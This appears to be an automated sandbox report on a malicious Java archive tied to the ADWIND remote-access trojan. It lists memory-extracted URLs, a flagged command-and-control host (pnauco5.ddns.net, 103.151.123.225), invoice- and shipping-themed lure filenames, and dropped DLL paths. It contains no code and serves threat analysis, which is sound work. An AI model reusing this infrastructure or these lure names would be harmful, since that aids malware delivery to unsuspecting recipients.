                                                                                            http://www.lotus.com.xcopy.exe, 00000015.00000003.1744919775.00000000004E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://apache.org/xml/properties/validation/schema/root-type-definitiont(javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://apache.org/xml/properties/internal/namespace-binderjava.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://xml.org/sax/features/external-general-entitiesexjavaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://javax.xml.XMLConstants/property/accessExternalDTD;javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      http://apache.org/xml/properties/internal/stax-entity-resolverti=java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://apache.org/xml/properties/security-managerjavaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://java.sun.com/xml/dom/properties/ancestor-checkjavaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://www.torchmobile.com/)xcopy.exe, 00000015.00000003.1742677485.00000000004E0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                                                                          http://xml.org/sax/features/namespace-prefixesna(javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://apache.org/xml/features/xincludejavaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://creativecommons.org/licenses/xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.unicode.org/copyright.htmlxcopy.exe, 00000015.00000003.1741591994.00000000004E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://mozilla.org/MPL/2.0/.xcopy.exe, 00000015.00000003.1742230987.00000000004E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://apache.org/xml/properties/internal/xinclude-handler9javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://apache.org/xml/features/validation/schema-full-checkingjavaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://javax.xml.XMLConstants/property/javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://musicbrainz.orgxcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://apache.org/xml/features/validation/warn-on-duplicate-attdef/xni/XDjavaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://jrat.iojava.exe, 00000007.00000002.2845228924.0000000005189000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                                                                                                            http://apache.org/xml/properties/internal/grammar-pooljavaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://apache.org/xml/properties/localejavaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://javax.xml.XMLConstants/property/accessExternalSchemaDjavaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  http://java.sun.com/xml/stream/properties/reader-in-defined-statejavaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  http://apache.org/xml/properties/internal/validator/dtd:java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://apache.org/xml/features/allow-java-encodingsjavaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://apache.org/xml/properties/validation/schema/root-element-declarationjavaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://apache.org/xml/features/dom/include-ignorable-whitespace/javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://apache.org/xml/features/validation/schema-full-checkingin=javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://java.sun.com/xml/stream/properties/ignore-external-dtd/Nojava.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              http://apache.org/xml/properties/internal/datatype-validator-factory:java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://apache.org/xml/features/scanner/notify-builtin-refsnterna7javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://www.oracle.com/feature/use-service-mechanismjavaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://apache.org/xml/features/scanner/notify-builtin-refssjava.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://apache.org/xml/properties/schema/external-schemaLocationaKjavaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://javax.xml.XMLConstants/property/accessExternalDTDjavaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://apache.org/xml/xmlschema/1.0/anonymousTypesjavaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://apache.org/xml/features/validation/identity-constraint-checkingesjavaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://apache.org/xml/features/validation/schema/normalized-valuejavaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://apache.org/xml/features/xinclude/fixup-languagejavaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://www.torchmobile.com/xcopy.exe, 00000015.00000003.1742677485.00000000004E0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                                                                                                                                http://apache.org/xml/properties/internal/dtd-processort5javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://apache.org/xml/features/validation/warn-on-undeclared-elemdefm/su:javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://chasen.aist-nara.ac.jp/chasen/distribution.htmlxcopy.exe, 00000015.00000003.1741591994.00000000004E0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                                                                                                                                    http://apache.org/xml/features/xinclude1javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://apache.org/xml/features/nonvalidating/load-external-dtdch:javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://apache.org/xml/properties/dom/document-class-namejavaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespacejavaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          		unknown
                                                                                                                                                                          http://apache.org/xml/features/validation/schema/ignore-xsi-type-until-elemdeclAjava.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://apache.org/xml/properties/internal/symbol-tablejavaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://github.com/rober42539/lao-dictionary/LICENSE.txtxcopy.exe, 00000015.00000003.1741591994.00000000004E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://apache.org/xml/properties/internal/error-handler6javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://apache.org/xml/properties/Djava.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high

                                                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                                    Public IPs

                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                    103.151.123.225
                                                                                                                                                                                    		pnauco5.ddns.netunknown
                                                                                                                                                                                    		135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue

                                                                                                                                                                                    Private

                                                                                                                                                                                    IP
                                                                                                                                                                                    127.0.0.1

                                                                                                                                                                                    General Information

                                                                                                                                                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                    Analysis ID:1427166
                                                                                                                                                                                    Start date and time:2024-04-17 07:01:06 +02:00
                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                    Overall analysis duration:0h 11m 27s
                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                    Report type:full
                                                                                                                                                                                    Cookbook file name:defaultwindowsfilecookbook.jbs
                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                    Number of analysed new started processes analysed:81
                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                    Technologies:
                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                    • GSI enabled (Java)
                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                    Sample name:NewOrder - P2D041197.jar
                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                    Classification:mal100.phis.troj.expl.evad.winJAR@196/300@1/2
                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                    • Successful, ratio: 33.3%
                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                    • Successful, ratio: 93%
                                                                                                                                                                                    • Number of executed functions: 44
                                                                                                                                                                                    • Number of non-executed functions: 14
                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                    • Found application associated with file extension: .jar

                                                                                                                                                                                    Warnings

                                                                                                                                                                                    • Exclude process from analysis (whitelisted): RuntimeBroker.exe, ShellExperienceHost.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                    • Execution Graph export aborted for target java.exe, PID 7388 because it is empty
                                                                                                                                                                                    • Execution Graph export aborted for target java.exe, PID 7620 because it is empty
                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                                                    Simulations

                                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                    07:02:16API Interceptor1x Sleep call for process: WMIC.exe modified

                                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                                    IPs

                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                    103.151.123.225gcahfpmhcn.jsGet hashmaliciousADWINDBrowse
                                                                                                                                                                                      FACTURA.jarGet hashmaliciousADWINDBrowse
                                                                                                                                                                                        FEDEX-TNT OVERDUE UNPAID INVOICE980055177856..jarGet hashmaliciousADWINDBrowse

                                                                                                                                                                                          Domains

                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                          pnauco5.ddns.netgcahfpmhcn.jsGet hashmaliciousADWINDBrowse
                                                                                                                                                                                          • 103.151.123.225
                                                                                                                                                                                          FACTURA.jarGet hashmaliciousADWINDBrowse
                                                                                                                                                                                          • 103.151.123.225
                                                                                                                                                                                          FEDEX-TNT OVERDUE UNPAID INVOICE980055177856..jarGet hashmaliciousADWINDBrowse
                                                                                                                                                                                          • 103.151.123.225

                                                                                                                                                                                          ASNs

                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                          VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNgcahfpmhcn.jsGet hashmaliciousADWINDBrowse
                                                                                                                                                                                          • 103.151.123.225
                                                                                                                                                                                          FACTURA.jarGet hashmaliciousADWINDBrowse
                                                                                                                                                                                          • 103.151.123.225
                                                                                                                                                                                          FEDEX-TNT OVERDUE UNPAID INVOICE980055177856..jarGet hashmaliciousADWINDBrowse
                                                                                                                                                                                          • 103.151.123.225
                                                                                                                                                                                          SecuriteInfo.com.Win32.DropperX-gen.31374.14437.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 103.200.23.179
                                                                                                                                                                                          SecuriteInfo.com.Win32.DropperX-gen.31374.14437.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 103.200.23.179
                                                                                                                                                                                          FEDEX-TNT-OVERDUE-UNPAID-INVOICE980055177854.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                          • 180.214.236.46
                                                                                                                                                                                          SecuriteInfo.com.Win32.TrojanX-gen.15346.16027.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 103.200.23.139
                                                                                                                                                                                          SecuriteInfo.com.Win32.TrojanX-gen.15346.16027.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 103.200.23.139
                                                                                                                                                                                          BKGCONF-THD1914129-BKGCONF-THD1914129.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                          • 180.214.236.46
                                                                                                                                                                                          H2A6LpLYtc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                          • 14.225.234.68

                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                          No context

                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dllgcahfpmhcn.jsGet hashmaliciousADWINDBrowse
                                                                                                                                                                                            FACTURA.jarGet hashmaliciousADWINDBrowse
                                                                                                                                                                                              FEDEX-TNT OVERDUE UNPAID INVOICE980055177856..jarGet hashmaliciousADWINDBrowse
                                                                                                                                                                                                Purchase Orders-Reg.jarGet hashmaliciousADWINDBrowse
                                                                                                                                                                                                  Swift Advice $31,470.00.jarGet hashmaliciousADWINDBrowse
                                                                                                                                                                                                    nORDER 119A %26 1.jarGet hashmaliciousADWINDBrowse
                                                                                                                                                                                                      27 payment swift copy of the remaining paymen.jarGet hashmaliciousADWINDBrowse
                                                                                                                                                                                                        DHLAWB907853880911.jarGet hashmaliciousADWINDBrowse
                                                                                                                                                                                                          Quotation.jarGet hashmaliciousADWINDBrowse
                                                                                                                                                                                                            fattura.jarGet hashmaliciousADWINDBrowse
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\API-MS-Win-core-xstate-l2-1-0.dllgcahfpmhcn.jsGet hashmaliciousADWINDBrowse
